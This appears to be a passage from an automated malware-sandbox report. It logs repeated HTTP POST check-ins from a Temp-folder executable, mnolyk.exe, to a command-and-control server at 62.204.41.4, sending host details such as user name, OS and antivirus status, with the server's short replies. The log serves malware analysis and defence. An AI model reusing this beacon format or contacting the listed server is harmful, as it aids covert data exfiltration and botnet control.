                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:47.357366085 CET313INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    113192.168.2.34981562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:47.530708075 CET314OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:47.595089912 CET314INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    114192.168.2.34981662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:47.785160065 CET315OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:47.847796917 CET315INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    115192.168.2.34981762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:48.055582047 CET316OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.123281002 CET316INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    116192.168.2.34981862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:48.341113091 CET317OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.404982090 CET317INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    117192.168.2.34981962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:48.579157114 CET318OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.643449068 CET318INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    118192.168.2.34982062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:48.811904907 CET319OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:48.877062082 CET319INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    119192.168.2.34982162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:49.045770884 CET320OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.112457037 CET320INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    12192.168.2.34971362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:12.783643007 CET212OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:12.846388102 CET213INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    120192.168.2.34982262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:49.295197010 CET321OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.359004021 CET321INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    121192.168.2.34982362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:49.543781996 CET322OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.606847048 CET322INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    122192.168.2.34982462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:49.780553102 CET323OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:49.842638969 CET323INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    123192.168.2.34982562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:50.017874002 CET324OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.084322929 CET324INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    124192.168.2.34982662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:50.292454958 CET325OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.359834909 CET325INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    125192.168.2.34982762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:50.529166937 CET326OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.592324972 CET326INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    126192.168.2.34982862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:50.782978058 CET327OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:50.848160982 CET327INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    127192.168.2.34982962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:51.027291059 CET328OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.091653109 CET328INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    128192.168.2.34983062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:51.265355110 CET329OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.328028917 CET329INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    129192.168.2.34983162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:51.495547056 CET330OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:51.557868004 CET330INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    13192.168.2.34971462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:13.211258888 CET213OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:13.275711060 CET214INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


